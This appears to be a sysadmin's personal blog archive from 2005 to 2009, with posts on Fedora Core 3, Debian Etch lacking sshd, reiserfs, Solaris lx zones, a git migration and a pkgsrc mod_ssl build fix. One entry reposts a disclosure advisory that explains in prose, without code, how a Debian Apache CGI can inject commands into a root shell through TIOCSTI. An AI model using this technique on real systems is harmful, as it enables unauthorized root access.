"That which is overdesigned, too highly specific, anticipates outcome; the anticipation of outcome guarantees, if not failure, the absence of grace."
-- William Gibson, All Tomorrow's Parties
January 26, 2005

Harry bitched at me for making that Red Hat joke the other day, so just to be an ass I went ahead and downloaded the Fedora Core 3 ISOs. Finally got around to installing it on a machine today:

Dual P3 900-something, 512MB RAM, SCSI, Ensoniq something or other, NVidia something, Intel EEPro.

It's a Penguin Computing workstation, so all the parts are pretty much guaranteed to work, or they're bad.

Anyway, it booted, saw stuff, installed.

So far it's not awful. I just went with the Workstation install, just to screw with it, since it's just a toy to me. The up2date tool is nice. The fact that it's in the menubar at launch is good stuff. I just pulled a 130MB of updates just now and it's installing.

Netfilter defaults to on, as does SELinux, so there's actual Workstation Security stuff going on, which is pretty awesome.

GNOME 2.8 is fast. The menu layout still sucks. After using OS X for the past two years, I'm not used to wading through menus to get at things anymore, especially not simply configuration/preferences. There should be some sort of central location for that stuff. (Is there? gconf doesn't count.)

The keychain icon in the toolbar when you auth to root is good stuff as well.

Overall, thus far, I would say it's a pretty good product.

That said, some people have run into problems with the install or various other things. Perhaps I'll hit those, but probably not before I install something else on the machine. :)

It should also be noted that the Windows Browser thing is still broken. I've never seen a distro where it actually does work, though, so you can't really hold it against RH (I guess).

I had initially intended on getting some RH server action and doing a real review, and how it stood up against other server OSes (Sol10, OpenBSD, etc), but obviously I can't get at the RH Enterprise bits, and reviewing FC3:Server against those just doesn't really seem fair.

I would reccommend it to someone who just wants a workstation, anyway.

February 26, 2007

[Full-disclosure] Local user to root escalation in apache 1.3.34 (Debian only)

Version 1.3.34-4 of Apache in the Debian Linux distribution contains a hole that allows a local user to access a root shell if the webserver has been restarted manually. This bug does not exist in the upstream apache distribution, and was patched in specifically by the Debian distribution. The bug report is located at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of writing (over a month since the root hole was clarified), there has been no official acknowledgement. It is believed that most of the developers are tied up in more urgent work, getting the TI-86 distribution of Debian building in
time for release.

Unlike every other daemon, apache does not abdicate its controlling tty on startup, and allows it to be inherited by a cgi script (for example, a local user's CGI executed using suexec). When apache is manually restarted, the inherited ctty is the stdin of the (presumably root) shell that invoked the new instance of apache. Any process is permitted to invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows it to inject characters that appear to come from the terminal master. Thus, a user created CGI script can inject and have executed any input into the shell that spawned apache.

As a Debian user, this concerns me greatly, as any non-privileged user would be able to install non-free documentation (GFDL) on any system I run.

Richard

April 8, 2007

Well, it looks like Debian 4.0 (Etch) has been released. And they have a new project leader. And they're talking about trying to get releases out every two years.


* bda peaks out the window, looking for amphibian precipitation or airborne porcine.

The whole dunc-tank thing was, in a lot of ways, the final straw for me. Not the fact that some Debian leads and devs got paid for their work. Who cares, as long as they were doing the work? No, the fact that a bunch of essentially commie programmers jumped ship from the leading commie Linux distro to work on Ubuntu, which is pretty damn far from the Debian project's ideals (regardless of the noise Ubuntu people make).

But when it all comes down to it, I don't care about this crap anymore. I don't care that an OpenBSD dev goofed up and commited GPL'd code to the public CVS repo, I don't care that there was a huge flame-out on linux-wireless@, I don't care about ridiculous community in-fighting.

At the end of the day I want two things:

  • Something that works
  • Something with a stable release cycle

Maybe Debian can get there again, though as Ian Murdock recently said during one of his interviews about being hired at Sun, Debian is all about the process these days. And their process is broken.

April 12, 2007

While I was at the colo tonight doing other stuff, I installed Debian 4.0 on one of our SuperMicros (older rev SATA cards which aren't supported by Solaris). The install was relatively painless. I got my metadisks and volumes set up with ease, it didn't ask any stupid questions, and there wasn't any post-install setup.

I chose the "standard" install, as I didn't want www, mx, or anything else going on. I just wanted the standard base Debian install I've been used to for the last ten years. The system gets to a login prompt, I unplug the display, and go back to my other tasks.

When I finally get home, I log into the... wait. What?

[bda@selene]:[~]$ ssh root@moon
ssh: connect to host moon port 22: Connection refused

I... What?

So I think to myself: Maybe I am crazy. Maybe there were some post-install setup questions and I just wasn't paying attention. After a quick install into a Parallels virtual machine, it's quite apparent that, at least in this particular context, I am not insane.

No OpenSSH by default in Debian 4.0.

But hey, nfs-common, portmap, and inetd are all running! So ... that's something.

It's like Debian is saying "We need to be more like Ubuntu. How can we do that? Hey, they don't ship with sshd by default, let's do that!"

This is a load of bollocks. It's an incredibly basic policy change (one I've relied on for as long as I've used Debian -- ten fucking years!) and it wasn't mentioned in any of the fucking release notes or announcements.

This is total bullshit.

April 26, 2007

Let it be known that I am not a fan of reiserfs. I have had it screw me over too many times at all hours, force me to sit around while it's had to fsck repeatedly to get anywhere, yadda yadda...

So when people start talking about why reiser4 isn't in the Linux kernel yet I just have to grunt and go back to working on getting all our stuff on Solaris.

And, the bastion of hilarious insanity that it is, the first comment on osnews?

Am I the only one who feels that Linux *badly* needs a new filesystem, and that is a shame that Reiser4, having been declared stable years ago, isn't still being officially supported?

When I saw that SUSE had dropped Reiserfs (3) as its default filesystem I had the shock of my life.

Reminds me of those birds from Mostly Harmless. The ones who were like flying goldfish: Constantly surprised by the most inane things.

October 15, 2007

Based on Albert Lee's howto:


[20071015-08:38:52]:[root@clamour]:[~]# uname -a
SunOS clamour 5.10 Generic_120012-14 i86pc i386 i86pc
[20071015-08:38:53]:[root@clamour]:[~]# zoneadm list -cv
ID NAME STATUS PATH BRAND IP
0 global running / native shared
3 control running /export/zones/control native shared
4 lunix running /export/zones/lunix lx shared
[20071015-08:38:56]:[root@clamour]:[~]# zlogin lunix
[Connected to zone 'lunix' pts/5]
Last login: Mon Oct 15 12:37:28 2007 from zone:global on pts/4
Linux lunix 2.4.21 BrandZ fake linux i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lunix:~#

After I stop laughing hysterically, visions of collapsing Linux boxes into Solaris zones dancing through my twitching little mind, I'll have to see how twitchy the install itself is. Already it appears that some stuff is unhappy, though most of it seems to revolve around things that don't matter (ICMP oddities, console oddities wrt determing how smart it is for restarting services -sigh- and a few other easily surmountable or ignorable things).

Overall: Hello, awesome.

(Update: It appears that 6591535 makes this a non-starter. I am now, again, a very sad bda with a bunch of crappy hardware and nowhere to move their services to.)

March 1, 2009

Over the last two weeks we (read: rjbs) migrated our Subversion repositories to git on GitHub. I was not very pleased with this for the first week or so. By default, I am grumpy when things that (to me) are working just fine are changed, especially at an (even minor) inconvenience to me. That is just the grumpy, beardy sysadmin in me.

After a bit more talking to by rjbs, things are again smooth sailing. I can do the small amount of VCS work I need to do, and more imporantly: I am assured things I don't care about will make the developers lives much, much less painful, which is something I am certainly all for.

git is much faster than Subversion ever was, and I can see some features as being useful to me eventually. Overall, though, what I use VCS for is pretty uninteresting, so I don't have much else to say about it.

I had a couple basic mental blocks that rjbs was able to explain away in a 20 minute talk he gave during our bi-weekly iteration meeting. It was quite productive. There are pictures.

Work has otherwise consisted of a lot of consolidation. I have finally reduced the number of horrible systems to two. Yes. Two. Both of which are slated for destruction in the next iteration. Not only that, I have found some poor sucker (hi, Cronin!) to take them all off our hands. Of course, they'll be upgrading from PIIIs, so...

I also cleaned up our racks. A lot. They are almost clean enough to post pictures of, though I'll wait until I've used up more of the six rolls of velcro Matt ordered before doing that.

Pretty soon we'll have nothing but Sun, a bit of IBM, and a very small number of SuperMicros. My plans are to move our mail storage from the existing SCSI arrays to a Sun J4200 (hopefully arriving this coming week). 6TB raw disk, and it eats 3.5" SATA disks, which are ridiculously cheap these days. I really, really wanted an Amber Roads (aka OpenStorage) J7110, but at 2TB with the cost of 2.5" SAS, it was impossible to justify. If they sold a SATA version at the low-end... there has been some noise about conversion kits for Thumpers, but that's also way outside our price range.

I doubt conversion support will become more common, but if I could turn one of our X4100s and the J4200 into an OpenStorage setup, I would incredibly happy. If you haven't tried out the OpenStorage Simulator, I suggest you do so. Analytics is absolutely amazing.

People on zfs-discuss@ and #opensolaris have been talking about possible GSoC projects. I suggested a zpool/filesystem "interactive" attribute, or "ask before destroy." However you want to think of it. Someone else expanded on that, suggesting that -t be allowed to ensure that only specified resource types can be destroyed. I have yet to bone myself with a `zfs destroy` or `zpool destroy` but the day will come, and I will cry.

I see a pkgsrc upgrade in my near future. I've been working on linking all our Perl modules against it, and I want to get the rest of our internal code linking against it as well. It will make OS upgrades so, so much easier. Right now, most code is either linked to OS libraries or to an internal tree (most of which also links to OS libraries).

We've almost gotten rid of all our Debian 3.1 installs, which is... well. You know. Debian 5.0 just came out, and we've barely gotten moved to 4.0 yet. Getting the upgrade path there sorted out will thankfully just be tedious, and require nothing clever.

I really hope that the Cobbler guys get Debian partitioning down soon, and integrate some Solaris support. I tried redeploying FAI over Christmas and man, did it so not work out of the box. I used to use FAI, and was quite happy with it. I had to hack it up, but... it worked pretty well. Until it stopped.

If Cobbler had Solaris support, I would seriously consider moving our remaining Linux installs to CentOS. We use puppet already, so in many ways Cobbler is a no-brainer. We are not really tied to any particular Linux distribution, and having all our infrastructure under a single management tools ken would be really nice. To put it mildly.

30% curious about OpenSolaris's Automated Installer project, but it's so far off the radar as to be a ghost.

I picked up John Allspaw's The Art of Capacity Planning, and it's next on my book queue. Flipping through it makes me think it's going to be as useful as Theo S.'s Scalable Internet Architectures.

March 18, 2009

So Linux has a history of hosed db interfaces. Apache worked around this about ten years ago by including their own SDBM in their distribution.

pkgsrc separates their Apache packages into DSOs. So mod_perl, mod_fastcgi, mod_ssl, etc, are built as separate packages. However, when you compile Apache1 with no SSL, it disables SDBM, so mod_ssl (which requires some sort of DBM) fails.

The PR is here.

My workaround was to do this:

ap-ssl$ bmake patch

ap-ssl$ vi /usr/pkg/pkgsrc/www/ap-ssl/work/mod_ssl-2.8.31-1.3.41/pkg.sslmod/libssl.module

Search for the first instance of APXS.

Add the following two lines above it:

APXS_MODE="yes"

my_rule_SSL_SDBM="yes"

And ap-ssl will compile happily.